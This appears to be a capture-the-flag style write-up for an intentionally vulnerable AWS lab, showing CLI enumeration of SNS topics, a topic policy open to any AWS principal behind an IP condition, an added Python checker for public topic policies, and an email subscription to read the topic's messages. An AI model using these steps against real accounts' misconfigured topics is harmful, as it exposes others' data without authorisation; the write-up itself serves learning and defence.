What does it mean when we say something is “public” in the cloud? Do you need an IP address to be public? What if a resource is accessible to anyone in the world, provided they have an AWS account (any AWS account). That seems close enough to public to scare me!

(Note: FWIW, there is a policy on the resource in question that will only allow you to exploit it from your IP address, to prevent misuse.)

There are two cloudfox commands that can help you here.

Information Gathering

The word “topic” gets me thinking of AWS SNS, so I’ll start enumerating topics there.

adicpnn@laboratory cloud % aws sns list-topics --profile cloudfoxable
{
    "Topics": [
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:executioner"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:public"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:user-updates-topic"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:user-updates-topic.fifo"
        }
    ]
}

Then, for each topic, I’ll look into its access policy.

adicpnn@laboratory cloud % aws sns get-topic-attributes --topic-arn arn:aws:sns:eu-central-1:129323993607:eventbridge-sns --profile cloudfoxable
{
    "Attributes": {
        "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"snspolicy\",\"Statement\":[{\"Sid\":\"First\",\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":[\"sns:Subscribe\",\"sns:Publish\"],\"Resource\":\"arn:aws:sns:eu-central-1:129323993607:eventbridge-sns\",\"Condition\":{\"IpAddress\":{\"aws:SourceIp\":\"nope\"}}}]}",
        "LambdaSuccessFeedbackSampleRate": "0",
        "Owner": "129323993607",
        "SubscriptionsPending": "0",
        "TopicArn": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns",
        "EffectiveDeliveryPolicy": "{\"http\":{\"defaultHealthyRetryPolicy\":{\"minDelayTarget\":20,\"maxDelayTarget\":20,\"numRetries\":3,\"numMaxDelayRetries\":0,\"numNoDelayRetries\":0,\"numMinDelayRetries\":0,\"backoffFunction\":\"linear\"},\"disableSubscriptionOverrides\":false,\"defaultRequestPolicy\":{\"headerContentType\":\"text/plain; charset=UTF-8\"}}}",
        "FirehoseSuccessFeedbackSampleRate": "0",
        "SubscriptionsConfirmed": "0",
        "SQSSuccessFeedbackSampleRate": "0",
        "HTTPSuccessFeedbackSampleRate": "0",
        "ApplicationSuccessFeedbackSampleRate": "0",
        "DisplayName": "",
        "SubscriptionsDeleted": "0"
    }
}

This might not be apparent at first sight, but the topic policy allows anyone to subscribe to it: the Principal is "*", so any AWS account qualifies, and the only restriction is the aws:SourceIp condition.

{
  "Version": "2012-10-17",
  "Id": "snspolicy",
  "Statement": [
    {
      "Sid": "First",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sns:Subscribe",
        "sns:Publish"
      ],
      "Resource": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns",
      "Condition": {
        "IpAddress": {
          "aws:SourceIp": "nope"
        }
      }
    }
  ]
}
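To make the "anyone can subscribe" finding mechanical rather than eyeballed, here is an added example (my own code, not part of the original writeup or of cloudfox) that parses an SNS topic policy the way it comes back from get-topic-attributes (a JSON string nested inside the Attributes map) and classifies it. It flags Allow statements whose Principal is "*" or {"AWS": "*"}, lists the sensitive actions they grant (expanding sns:* and * wildcards), and reports which condition keys, if any, actually narrow the caller. The policy below is the one from the writeup; the hardened variant and the helper names (analyze_topic_policy, policy_from_attributes, CALLER_SCOPING_KEYS) are my own constructions.

```python
import json
from fnmatch import fnmatchcase

# Topic policy copied from the writeup's get-topic-attributes output
# (the author redacted the real aws:SourceIp value as "nope").
WRITEUP_POLICY = {
    "Version": "2012-10-17",
    "Id": "snspolicy",
    "Statement": [{
        "Sid": "First",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["sns:Subscribe", "sns:Publish"],
        "Resource": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns",
        "Condition": {"IpAddress": {"aws:SourceIp": "nope"}},
    }],
}

# Constructed "fixed" variant: same statement, but scoped to the owning account.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::129323993607:root"},
        "Action": ["sns:Subscribe", "sns:Publish"],
        "Resource": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns",
    }],
}

# Condition keys that narrow WHO may call (lower-cased for comparison).
# Keys such as sns:Protocol or sns:Endpoint only shape HOW, so they are
# deliberately not in this set and do not count as a guard.
CALLER_SCOPING_KEYS = {
    "aws:sourceip", "aws:sourcevpce", "aws:sourcevpc",
    "aws:principalaccount", "aws:principalorgid", "aws:principalarn",
    "aws:sourceaccount", "aws:sourcearn", "aws:sourceowner",
}

# Actions worth raising when granted to everyone.
SENSITIVE_ACTIONS = ("sns:Subscribe", "sns:Publish", "sns:Receive",
                     "sns:SetTopicAttributes", "sns:AddPermission")


def _as_list(value):
    """IAM lets most fields be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def policy_from_attributes(attributes_response):
    """Pull the topic policy out of a get-topic-attributes JSON response.

    The CLI returns {"Attributes": {"Policy": "<json string>", ...}}, so the
    policy has to be decoded a second time.
    """
    if isinstance(attributes_response, str):
        attributes_response = json.loads(attributes_response)
    return json.loads(attributes_response["Attributes"]["Policy"])


def principal_is_anyone(principal):
    """True for Principal "*" or {"AWS": "*"}: every AWS account (or no account)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def granted_sensitive_actions(statement):
    """Sensitive actions this statement grants, honouring sns:* and * wildcards."""
    patterns = [p.lower() for p in _as_list(statement.get("Action", []))]
    return [a for a in SENSITIVE_ACTIONS
            if any(fnmatchcase(a.lower(), p) for p in patterns)]


def caller_guards(statement):
    """Condition entries (operator/key) that restrict who the caller can be."""
    guards = []
    for operator, keys in statement.get("Condition", {}).items():
        for key in keys:
            if key.lower() in CALLER_SCOPING_KEYS:
                guards.append(f"{operator}/{key}")
    return guards


def analyze_topic_policy(policy):
    """Return (verdict, findings) for one SNS topic policy.

    verdict: "public" (anyone, no caller guard), "conditionally-public"
    (anyone, but every such grant carries a caller-scoping condition) or
    "not-public".
    """
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not principal_is_anyone(stmt.get("Principal")):
            continue
        actions = granted_sensitive_actions(stmt)
        if actions:
            findings.append({"sid": stmt.get("Sid"), "actions": actions,
                             "guards": caller_guards(stmt)})
    if not findings:
        return "not-public", findings
    if any(not f["guards"] for f in findings):
        return "public", findings
    return "conditionally-public", findings


if __name__ == "__main__":
    for name, pol in (("writeup", WRITEUP_POLICY), ("hardened", HARDENED_POLICY)):
        verdict, findings = analyze_topic_policy(pol)
        print(f"{name}: {verdict} {findings}")
```

Run over every topic ARN from list-topics, anything that comes back "public" or "conditionally-public" deserves a look; a verdict that rests on a single aws:SourceIp guard, as in the writeup, is only as good as that one address, which is exactly the situation the post goes on to exploit.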

Execution

I’ll proceed with subscribing to the topic via email, making sure I confirm the subscription first.

adicpnn@laboratory cloud % aws sns subscribe --topic-arn arn:aws:sns:eu-central-1:129323993607:eventbridge-sns --notification-endpoint email@.com --protocol email --profile cloudfoxable
{
    "SubscriptionArn": "pending confirmation"
}

[Image: Confirmation email for AWS SNS topic]

After a quick wait, a notification message should pop up.

[Image: AWS Notification]